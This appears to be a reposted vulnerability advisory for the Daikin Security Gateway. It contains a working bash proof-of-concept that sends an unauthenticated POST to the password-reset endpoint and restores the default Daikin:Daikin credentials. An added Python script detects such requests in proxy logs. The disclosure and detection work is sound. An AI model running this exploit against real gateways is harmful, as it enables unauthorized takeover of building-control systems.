Daikin Security Gateway 14 Remote Password Reset
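The Daikin Security Gateway has a remote password reset vulnerability: an attacker can use an API endpoint to bypass the authentication mechanism and reset the system password to the default "Daikin:Daikin", gaining unauthorized access. The vulnerability was discovered and disclosed by Gjoko 'LiquidWorm' Krstic in March 2025. 2025-5-3 21:54:35 Author: cxsecurity.com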


```bash
# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
#                   https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#

[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }
TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"

[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }

RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)
[ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; }

if [[ $RESPONSE =~ \"Error\":0 ]]; then
    echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
    echo "Not vulnerable."
else
    echo "Got: $RESPONSE"
fi
```
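Defensive example added here (not part of the advisory and not vendor code): a log check that flags POST requests to the reset endpoint the advisory names, `/api/settings/password/reset`. It assumes a reverse proxy or network sensor in front of the gateway that writes Combined Log Format; the admin network range, the severity labels and all sample log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

RESET_PATH = "/api/settings/password/reset"  # endpoint named in the advisory
# Assumption: hosts allowed to administer the gateway (constructed range).
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/28")]
# Assumption: a proxy or sensor in front of the device logs Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Constructed sample lines, not captured traffic.
SAMPLE_LOG = """\
10.20.0.5 - - [21/Mar/2025:09:14:02 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Mar/2025:09:15:10 +0100] "POST /api/settings/password/reset HTTP/1.1" 200 23 "-" "curl/8.5.0"
192.0.2.44 - - [21/Mar/2025:09:15:12 +0100] "POST /API/settings/password/reset/?x=1 HTTP/1.1" 200 23 "-" "curl/8.5.0"
10.20.0.5 - - [21/Mar/2025:10:01:00 +0100] "POST /api/settings/password/reset HTTP/1.1" 200 23 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Mar/2025:11:30:45 +0100] "POST /api/settings/password/reset HTTP/1.1" 403 0 "-" "python-requests/2.31"
malformed line
"""

def normalize(target):
    """Drop query string, percent-encoding, case and trailing slash before comparing."""
    return unquote(urlsplit(target).path).lower().rstrip("/")

def find_reset_requests(log_text):
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or normalize(m["target"]) != RESET_PATH:
            continue
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            src = None  # hostname or garbage in the client field: treat as untrusted
        trusted = src is not None and any(src in net for net in ADMIN_NETS)
        status = int(m["status"])
        # The "Error":0 result sits in the response body, which the log lacks; 2xx is a stand-in.
        if trusted:
            severity = "review"   # confirm with the operator that the reset was intended
        elif 200 <= status < 300:
            severity = "high"     # request from an unexpected host reached the device
        else:
            severity = "medium"   # request that was blocked or failed
        findings.append({"src": m["src"], "ts": m["ts"], "status": status, "severity": severity})
    return findings

if __name__ == "__main__":
    print(*find_reset_requests(SAMPLE_LOG), sep="\n")
```

A "high" finding is a reason to check whether the device still accepts the default Daikin:Daikin credentials and to rotate them from a management host.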



 



Source: https://cxsecurity.com/issue/WLB-2025050010